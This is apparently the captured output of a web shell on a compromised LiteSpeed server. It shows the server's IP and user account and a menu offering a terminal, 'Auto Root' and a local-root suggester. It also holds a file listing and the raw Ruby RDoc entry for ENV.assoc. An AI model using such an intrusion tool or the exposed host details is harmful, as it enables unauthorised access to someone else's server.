Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.45
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby30 /
share /
ri /
system /
ENV /
Delete
Unzip
Name
Size
Permission
Date
Action
%5b%5d%3d-c.ri
2.17
KB
-rw-r--r--
2024-06-26 17:25
%5b%5d-c.ri
661
B
-rw-r--r--
2024-06-26 17:25
assoc-c.ri
1.39
KB
-rw-r--r--
2024-06-26 17:25
cdesc-ENV.ri
4.89
KB
-rw-r--r--
2024-06-26 17:25
clear-c.ri
480
B
-rw-r--r--
2024-06-26 17:25
delete-c.ri
1.35
KB
-rw-r--r--
2024-06-26 17:25
delete_if-c.ri
1.2
KB
-rw-r--r--
2024-06-26 17:25
each-c.ri
942
B
-rw-r--r--
2024-06-26 17:25
each_key-c.ri
834
B
-rw-r--r--
2024-06-26 17:25
each_pair-c.ri
952
B
-rw-r--r--
2024-06-26 17:25
each_value-c.ri
853
B
-rw-r--r--
2024-06-26 17:25
empty%3f-c.ri
498
B
-rw-r--r--
2024-06-26 17:25
except-c.ri
591
B
-rw-r--r--
2024-06-26 17:25
fetch-c.ri
1.65
KB
-rw-r--r--
2024-06-26 17:25
filter%21-c.ri
1.86
KB
-rw-r--r--
2024-06-26 17:25
filter-c.ri
1.39
KB
-rw-r--r--
2024-06-26 17:25
freeze-c.ri
386
B
-rw-r--r--
2024-06-26 17:25
has_key%3f-c.ri
1.67
KB
-rw-r--r--
2024-06-26 17:25
has_value%3f-c.ri
668
B
-rw-r--r--
2024-06-26 17:25
include%3f-c.ri
1.67
KB
-rw-r--r--
2024-06-26 17:25
inspect-c.ri
482
B
-rw-r--r--
2024-06-26 17:25
invert-c.ri
903
B
-rw-r--r--
2024-06-26 17:25
keep_if-c.ri
1.05
KB
-rw-r--r--
2024-06-26 17:25
key%3f-c.ri
1.66
KB
-rw-r--r--
2024-06-26 17:25
key-c.ri
962
B
-rw-r--r--
2024-06-26 17:25
keys-c.ri
642
B
-rw-r--r--
2024-06-26 17:25
length-c.ri
486
B
-rw-r--r--
2024-06-26 17:25
member%3f-c.ri
1.67
KB
-rw-r--r--
2024-06-26 17:25
merge%21-c.ri
2.46
KB
-rw-r--r--
2024-06-26 17:25
rassoc-c.ri
827
B
-rw-r--r--
2024-06-26 17:25
rehash-c.ri
393
B
-rw-r--r--
2024-06-26 17:25
reject%21-c.ri
1.3
KB
-rw-r--r--
2024-06-26 17:25
reject-c.ri
979
B
-rw-r--r--
2024-06-26 17:25
replace-c.ri
1.06
KB
-rw-r--r--
2024-06-26 17:25
select%21-c.ri
1.86
KB
-rw-r--r--
2024-06-26 17:25
select-c.ri
1.39
KB
-rw-r--r--
2024-06-26 17:25
shift-c.ri
843
B
-rw-r--r--
2024-06-26 17:25
size-c.ri
482
B
-rw-r--r--
2024-06-26 17:25
slice-c.ri
878
B
-rw-r--r--
2024-06-26 17:25
store-c.ri
2.17
KB
-rw-r--r--
2024-06-26 17:25
to_a-c.ri
532
B
-rw-r--r--
2024-06-26 17:25
to_h-c.ri
1.31
KB
-rw-r--r--
2024-06-26 17:25
to_hash-c.ri
492
B
-rw-r--r--
2024-06-26 17:25
to_s-c.ri
360
B
-rw-r--r--
2024-06-26 17:25
update-c.ri
2.46
KB
-rw-r--r--
2024-06-26 17:25
value%3f-c.ri
660
B
-rw-r--r--
2024-06-26 17:25
values-c.ri
661
B
-rw-r--r--
2024-06-26 17:25
values_at-c.ri
952
B
-rw-r--r--
2024-06-26 17:25
Save
Rename
U:RDoc::AnyMethod[iI" assoc:ETI"ENV::assoc;TT:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"YReturns a 2-element Array containing the name and value of the environment variable ;TI"for +name+ if it exists:;To:RDoc::Markup::Verbatim; [I"-ENV.replace('foo' => '0', 'bar' => '1') ;TI"(ENV.assoc('foo') # => ['foo', '0'] ;T:@format0o; ; [I"YReturns +nil+ if +name+ is a valid String and there is no such environment variable.;To:RDoc::Markup::BlankLine o; ; [I"fReturns +nil+ if +name+ is the empty String or is a String containing character <code>'='</code>.;T@o; ; [I"^Raises an exception if +name+ is a String containing the NUL character <code>"\0"</code>:;To;; [I"`ENV.assoc("\0") # Raises ArgumentError (bad environment variable name: contains null byte) ;T;0o; ; [I"PRaises an exception if +name+ has an encoding that is not ASCII-compatible:;To;; [I">ENV.assoc("\xa1\xa1".force_encoding(Encoding::UTF_16LE)) ;TI"c# Raises ArgumentError (bad environment variable name: ASCII incompatible encoding: UTF-16LE) ;T;0o; ; [I"3Raises an exception if +name+ is not a String:;To;; [I"UENV.assoc(Object.new) # TypeError (no implicit conversion of Object into String);T;0: @fileI"hash.c;T:0@omit_headings_from_table_of_contents_below0I"-ENV.assoc(name) -> [name, value] or nil ;T0[ I" (p1);T@-FI"ENV;TcRDoc::NormalClass00